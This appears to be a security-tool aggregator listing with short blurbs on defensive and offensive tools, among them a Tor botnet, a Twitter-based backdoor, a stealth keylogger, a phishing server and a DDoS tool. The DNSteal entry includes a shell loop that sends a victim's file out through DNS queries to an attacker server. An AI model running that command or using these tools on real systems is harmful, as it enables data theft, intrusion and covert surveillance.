Codetainer - A Docker Container In Your Browser

codetainer allows you to create code 'sandboxes' you can embed in your web applications think of it like an OSS clone of codepicnic.com . Codetainer runs as a webservice and provides APIs to create, view, and attach to the sandbox along with a nifty HTML terminal you can interact with the sandbox...

LiME - Linux Memory Extractor

A Loadable Kernel Module LKM which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android. This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space...

WAP - Web Application Protection

WAP is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP version 4.0 or higher with a low rate of false positives. WAP detects and corrects the following vulnerabilities: SQL Injection SQLI Cross-site...

Bluto - DNS Recon, DNS Zone Transfer, and Email Enumeration

BLUTO DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto wil...

Wireshark v2.0 - The World’s Foremost Network Protocol Analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto and often de jure standard across many industries and educational institutions. Wireshark development thrives thanks to the...

Toxy - Hackable Http Proxy To Simulate Server Failure Scenarios And Network Conditions

Toxy is a fully programmatic and hackable HTTP proxy to simulate server failure scenarios and unexpected network conditions , built for node.js / io.js . It was mainly designed for fuzzing/evil testing purposes, when toxy becomes particularly useful to cover fault tolerance and resiliency...

Tails 1.7 - The Amnesic Incognito Live System

Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity , and helps you to: use the Internet anonymously and circumvent censorship ; all connections to the Internet are forced to go through the...

Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an...

KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory

KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData% General Design KeeFarce uses DLL injection to execute code within the context of a runnin...

ARDT - Akamai Reflective DDoS Tool

Akamai Reflective DDoS Tool Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services. How it works... Based off the research done at NCC: https://dl.packetstormsecurity.net/papers/attack/thepentestersguidetoakamai.pdf Akamai boast around 100,00...

Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly. Usage sudo python InfernalWireless.py How to install $ sudo apt-get install apache2 $ sudo apt-get install mysql-server...

ZIB - The Open Tor Botnet

General information and instructions. The Open Tor Botnet requires the installation and configuration of bitcoind, however I neglect to detail this here out of a lack of time. This bot-net is fully undetectable and bypasses all antivirus through running on top of Python27's pyinstaller, which is...

LMD - Linux Malware Detect

Linux Malware Detect LMD is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and...

XPL-SEARCH - Search Exploits In Multiple Exploit Databases

XPL SEARCH Search exploits in multiple exploit databases! Exploit databases available: Exploit-DB MIlw0rm PacketStormSecurity IntelligentExploit IEDB CVE TO RUN THE SCRIPT PHP Version cli 5.5.8 or higher php5-cli Lib cURL support Enabled php5-curl Lib cURL Version 7.40.0 or higher allowurlfopen O...

Powercat - Netcat: The Powershell Version

Installation powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts. Load The Function From Downloaded .ps1 File: . .\powercat.p...

MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework

Mobile Security Framework MobSF is an intelligent, all-in-one open source mobile application Android/iOS automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test...

Gping - Ping, But With A Graph

Ping, but with a graph Install and run Created/tested with Python 3.4, should run on 2.7 will require the statistics module though. pip3 install pinggraph Tested on Windows and Ubuntu, should run on OS X as well. After installation just run: gping yourhost If you don't give a host then it pings...

CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit

This project has been developed to exploit CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit. In few words, this is a simple HTTP Server in NodeJS that will communicate with the clients victims and send them payload that will be executed using JavaScript. This has bee...

Burpkit - Next-Gen Burpsuite Penetration Testing Tool

Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows...

Rubocop - A Ruby Static Code Analyzer, Based On The Community Ruby Style Guide

RuboCop is a Ruby static code analyzer. Out of the box it will enforce many of the guidelines outlined in the community Ruby Style Guide . Most aspects of its behavior can be tweaked via various configuration options. Installation RuboCop 's installation is pretty standard: $ gem install rubocop ...

Btproxy - Man In The Middle Analysis Tool For Bluetooth

Tested Devices Pebble Steel smart watch Moto 360 smart watch OBDLink OBD-II Bluetooth Dongle Withings Smart Baby Monitor If you have tried anything else, please let me know at conorpp at vt dot edu. Dependencies Need at least 1 Bluetooth card either USB or internal. Need to be running Linux,...

TheFuck - Magnificent App Which Corrects Your Previous Console Command

Few examples: ➜ apt-get install vim E: Could not open lock file /var/lib/dpkg/lock - open 13: Permission denied E: Unable to lock the administration directory /var/lib/dpkg/, are you root? ➜ fuck sudo apt-get install vim enter/↑/↓/ctrl+c sudo password for nvbn: Reading package lists... Done ... ➜...

B374K - PHP Webshell with handy features

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser. Features : File manager view, edit, rename, delete, upload, download, archiver, etc Search file, file content,...

Twittor - A fully featured backdoor that uses Twitter as a C&C server

A stealthy Python based backdoor that uses Twitter Direct Messages as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account. Setup For this to work you need: A Twitter account Use a dedicated account! Do not use your personal one! Regist...

BackBox Linux 4.4 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable...

Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform

A brand new version is ready for you to enjoy! Faraday v1.0.15 Community, Pro & Corp was published today with new exciting features. As a part of our constant commitment to the IT sec community we added a tool that runs several other tools to all IPs in a given list. This results in a major scan ...

ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network

Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io Why? We believe in open, free, and uncensored network and communication. No single point of failure: Site remains online so long as at least 1 peer serving it. No hosting costs: Sites are served by visitors...

QARK - Tool to look for several security related Android application vulnerabilities

Q uick A ndroid R eview K it - This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating "Proof-of-Concept" deployable APKs and/or ADB commands, capable of exploiting many of the...

Weeman - HTTP Server for Phishing

HTTP server for phishing in python. Weeman has support for most of the bigest websites. Usually you will want run Weeman with DNS spoof attack. see dsniff, ettercap. Weeman will do the following steps: 1. Create fake html page. 2. Wait for clients 3. Grab the data POST. 4. Try to login the client...

Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)

Heartbleed Vulnerability Scanner is a multiprotocol HTTP, IMAP, SMTP, POP CVE-2014-0160 scanning and automatic exploitation tool written with python. For scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system...

Gryffin - Large Scale Web Security Scanning Platform

Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale. Better coverage translates to fewer false negatives. Inherent scalability translates to capability of scanning, and...

Pupy - Multi-Platform Remote Administration Tool

Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk. Features : On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy doe...

Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10

Windows Spy Keylogger is the free software to help you covertly monitor all activities on your computer. It intercepts everything that is typed on keyboard and stores into one log file which you can view it anytime later. You can track logins , passwords , emails , chats and all other secret thin...

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...

Tiger - The Unix security audit and intrusion detection tool

Tiger is a security tool that can be use both as a security audit and intrusion detection system. It supports multiple UNIX platforms and it is free and provided under a GPL license. Unlike other tools, Tiger needs only of POSIX tools and is written entirely in shell language. Tiger has some...

PEInjector - MITM PE file infector

The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant,...

MALHEUR - Automatic Analysis of Malware Behavior

A novel tool for malware analysis Malheur is a tool for the automatic analysis of malware behavior program behavior recorded from malicious software in a sandbox environment. It has been designed to support the regular analysis of malicious software and the development of detection and defense...

Evil FOCA - MITM, DoS, DNS Hijacking in IPv4 and IPv6 Penetration Testing Tool

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. The tool is capable of carrying out various attacks such as: MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection. MITM on IPv6 networks with Neighbor...

CrackMapExec - A swiss army knife for pentesting Windows/Active Directory environments

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments! From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell! The biggest improvements over the above tools are: Pure...

WPHardening 1.5 - Fortify the security of any WordPress installation

Fortify the security of any WordPress installation. Installation Installing WPHardening requires you to execute one console command: $ pip install -r requirements.txt Usage $ python wphardening.py -h \ \ / / | | | | | | \ \ /\ / /| | | || | | | \ / / / | /| |/ | '/ |/ \ ' | | ' \ / | \ /\ / | |...

Weevely3 - Weaponized Web Shell

Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30...

Speedtest - Command Line Interface for Testing Internet Bandwidth

speedtest-cli is a command line interface for testing internet bandwidth using speedtest.net Installation pip / easyinstall pip install speedtest-cli or easyinstall speedtest-cli Github pip install git+https://github.com/sivel/speedtest-cli.git or git clone...

Pentoo 2015 - Security-Focused Livecd based on Gentoo

Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet injection patched wifi...

ZAP 2.4.2 - Penetration Testing Tool for Testing Web Applications

The Zed Attack Proxy ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testin...

Wfuzz - The Web Application Bruteforcer

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked directories, servlets, scripts, etc, bruteforce GET and POST parameters for checking different kind of injections SQL, XSS, LDAP,etc, bruteforce Forms parameters User/Password, Fuzzing,etc...

Sn1per - Automated Pentest Recon Scanner

Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Features Automatically collects basic recon ie. whois, ping, DNS, etc. Automatically launches Google hacking queries against a target domain Automatically enumerates open ports...

Droopescan - Scanner to identify issues with several CMSs, mainly Drupal & Silverstripe

A plugin-based scanner that aids security researchers in identifying issues with several CMS: Drupal. SilverStripe. Partial functionality for: Wordpress. Joomla. computer:/droopescan$ droopescan scan drupal -u http://example.org/ -t 8 + No themes found. + Possible interesting urls found: Default...

Discover - Custom bash scripts used to automate various pentesting tasks

For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks. Download, setup & usage git clone git://github.com/leebaird/discover.git /opt/discover/ All scripts must be ran from this location. cd /opt/discover/ ./setup.sh ./discover.sh RECON 1. Domain 2. Person 3. Parse...

SparkyLinux - Lightweight & fast Debian-based Linux Distribution

SparkyLinux is a GNU/Linux distribution created on the “testing” branch of Debian. It features customized lightweight desktops like E19, LXDE and Openbox, multimedia plugins, selected sets of apps and own custom tools to ease different tasks. Why Sparky? SparkyLinux is a Debian-based Linux...

Burp Suite Professional 1.6.26 - The Leading Toolkit for Web Application Security Testing

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security...